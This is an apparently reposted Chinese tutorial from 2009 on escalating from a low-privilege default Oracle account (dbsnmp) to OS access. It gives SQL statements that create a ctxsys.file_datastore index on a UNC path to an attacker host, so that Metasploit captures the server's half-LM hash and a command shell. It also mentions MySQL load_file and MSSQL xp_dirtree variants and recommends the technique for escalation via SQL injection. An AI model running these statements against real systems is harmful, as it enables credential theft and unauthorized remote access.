使用低权限 Oracle 数据库账户得到 OS 访问权限
2009-06-09 16:55:08 来源:WEB开发网图片看不清楚?请点击这里查看原图(大图)。
图片看不清楚?请点击这里查看原图(大图)。
3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect 和 resource 权限。
图片看不清楚?请点击这里查看原图(大图)。
4.然后执行下面 3 条 SQL 语句
SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)
UNIQUE,ot_format VARCHAR(6));
SQL> INSERT INTO files VALUES(1,’\192.168.1.52mickey’,NULL);
SQL>CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context
2 PARAMETERS(’datastore ctxsys.file_datastore format column ot_format’);
图片看不清楚?请点击这里查看原图(大图)。
当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系统当前服务用户的 half lm 哈希和 cmdshell 了。
图片看不清楚?请点击这里查看原图(大图)。
图片看不清楚?请点击这里查看原图(大图)。
后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file(’\\192.168.1.52mk.txt’)也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。 这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。
- ››使用脚本恢复WinXP系统的用户登录密码
- ››使用phpMyadmin创建数据库及独立数据库帐号
- ››使用Zend Framework框架中的Zend_Mail模块发送邮件...
- ››使用cout标准输出如何控制小数点后位数
- ››使用nofollow标签做SEO的技巧
- ››Oracle 数据库导入导出 dmp文件
- ››使用 WebSphere Message Broker 的 WebSphere Tra...
- ››使用SQL Server事件探查器做应用程序的性能分析
- ››使用SQL Server事件探查器分析死锁原因
- ››Oracle Application Server 的安装
- ››使用纯文本文件打造WCF服务
- ››使用 Dojo 开发定制 Business Space 小部件,第 4...
更多精彩
赞助商链接